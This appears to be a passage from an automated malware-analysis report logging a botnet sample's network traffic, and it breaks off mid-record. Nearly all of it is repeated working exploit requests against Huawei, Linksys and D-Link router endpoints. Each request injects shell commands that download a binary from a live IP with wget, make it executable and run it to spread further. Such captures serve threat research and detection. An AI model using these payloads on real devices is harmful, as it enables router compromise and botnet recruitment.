Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 